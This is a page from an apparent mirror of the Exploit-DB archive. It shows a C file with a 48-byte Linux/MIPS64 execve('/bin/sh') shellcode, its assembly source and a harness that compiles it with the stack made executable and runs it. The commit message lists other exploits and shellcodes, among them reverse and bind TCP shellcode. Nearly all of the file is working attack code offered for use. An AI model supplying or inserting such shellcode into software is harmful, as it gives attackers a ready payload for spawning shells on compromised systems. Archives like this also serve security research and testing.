bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_mips/45287.c
Offensive Security 444206a6be DB: 2018-08-30 
21 changes to exploits/shellcodes

NASA openVSP 3.16.1 - Denial of Service (PoC)
Immunity Debugger 1.85 - Denial of Service (PoC)
ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
Fathom 2.4 - Denial Of Service (PoC)
Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
HD Tune Pro 5.70 - Denial of Service (PoC)
Drive Power Manager 1.10 - Denial Of Service (PoC)
Easy PhotoResQ 1.0 - Denial Of Service (PoC)
Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)
SIPP 3.3 - Stack-Based Buffer Overflow
R 3.4.4 - Buffer Overflow (SEH)

Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure
phpMyAdmin 4.7.x - Cross-Site Request Forgery
Episerver 7 patch 4 - XML External Entity Injection
Argus Surveillance DVR 4.0.0.0 - Directory Traversal

Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)
Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)
Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)
2018-08-30 05:01:54 +00:00

56 lines
No EOL
1.2 KiB
C
Raw Blame History

/* Title: Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)
* Date: 2018-08-10
* Author: Antonio
*
* [*] execve(/bin/sh) shellcode for MIPS64
* [*] tested on MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* [*] 48 bytes
*
* gcc -fno-stack-protector -z execstack main.c -o main -g
*
* adp, SLAE - 1326, 2018.
*/
#include <stdio.h>
#include <string.h>
/*
.text
.global __start
__start:
dli $t0,0x69622f2f
sw $t0,-12($sp)
dli $t1,0x68732f6e
sw $t1,-8($sp)
sw $zero,-4($sp)
daddiu $a0,$sp,-12
slti $a1,$zero,-1
slti $a2,$zero,-1
dli $v0, 5057
syscall 0x40404
.align 8
*/
unsigned char shellcode[] =
"\x62\x69\x0c\x3c"
"\x2f\x2f\x8c\x35"
"\xf4\xff\xac\xaf"
"\x73\x68\x0d\x3c"
"\x6e\x2f\xad\x35"
"\xf8\xff\xad\xaf"
"\xfc\xff\xa0\xaf"
"\xf4\xff\xa4\x67"
"\xff\xff\x05\x28"
"\xff\xff\x06\x28"
"\xc1\x13\x02\x24"
"\x0c\x01\x01\x01";
int main(int argc, char ** argv)
{
void (*s) (void);
printf("Shellshellcode Length: %d\n", strlen(shellcode));
s = shellcode;
s();
}
Reference in a new issue View git blame Copy permalink